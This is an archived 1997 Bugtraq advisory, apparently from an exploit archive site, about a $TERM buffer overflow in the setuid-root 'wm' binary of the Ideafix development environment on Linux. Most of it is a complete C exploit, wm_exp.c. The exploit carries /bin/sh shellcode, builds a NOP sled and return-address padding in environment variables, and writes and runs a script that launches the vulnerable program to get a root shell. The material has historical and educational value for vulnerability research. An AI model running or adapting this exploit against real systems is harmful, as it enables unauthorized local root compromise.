Overfow in the Ideafix development environment

Summary
Description:standard overflow, in $TERM
Author:Bst Perez Companc <bst@INAME.COM>
Compromise: root (local)
Vulnerable Systems:Any systems running flawed version of ideafix, this exploit is for Linux
Date:19 October 1997
Details


Date: Sun, 19 Oct 1997 05:04:18 -0400
From: Bst Perez Companc <bst@INAME.COM>
To: BUGTRAQ@NETSPACE.ORG

A vulnerability exist in the package Ideafix distributed with several
versions of linux. [ ftp://sunsite.unc.edu/pub/Linux/devel/ideafix ]
                   [ ftp://ftp.inter-soft.com/pub/ideafix ].
This is a very popular development enviroment here in Argentina.
Due to the lack of proper bounds checking in the setuid root program wm, the
enviroment variable TERM is copied into a local fixedsize buffer, you guess
it, a shell with euid=0

Comments: bisti <bst@iname.com>
Greetz to fidel, larry, rb, rnt, veida.

[--------------------------- wm_exp.c ---------------------------]

/*
 * 'Ideafix wm' Exploit 4 Linux.
 */

#include <stdio.h>
#include <stdlib.h>

#define TERMSIZE        2000
#define HUEVOSIZE       5000

char *shell =
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

long
esp(void)
{
__asm__("movl %esp,%eax\n");
}

int
main(void)
{

    char *ptr, *bof, *egg;
    long *addr_ptr, addr;
    int i;


    if ( !(bof = malloc(TERMSIZE)) ) {
      printf("NoMoreMemory4bof.\n");
      exit(1);
    }

    if ( !(egg = malloc(HUEVOSIZE)) ) {
      printf("NoMoreMemory4egg.\n");
      exit(1);
    }

    addr = esp();

    addr_ptr = (long *) bof;
    for (i = 0; i < TERMSIZE; i += 4)
    *(addr_ptr++) = addr;

    ptr = egg;
    for (i = 0; i <= HUEVOSIZE - strlen(shell) - 2; i++)
        *(ptr++) = 0x90;

    for( i = 0; i < strlen(shell); i++)
        *(ptr++) = shell[i];


    bof[TERMSIZE - 1] = '\0';
    egg[HUEVOSIZE - 1] = '\0';

    memcpy(bof, "BOF=", 4);
    memcpy(egg , "EGG=", 4);

    putenv(bof);
    putenv(egg);

    system("echo '#!/bin/sh' >> doit");
    system("echo -n '# We kill any instance of wm, set TERM, ' >> doit");
    system("echo 'and run the vulnerable program.' >> doit");
    system("echo '# Bisti [111097]' >> doit");
    system("echo 'killall wm' >> doit");
    system("echo 'TERM=$BOF;export TERM' >> doit");
    system("echo '/usr/local/inter-soft/ideafix-4.3.2/bin/wm' >> doit");

    system("sh ./doit");

}
[---------------------------------------------------------------------------]

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault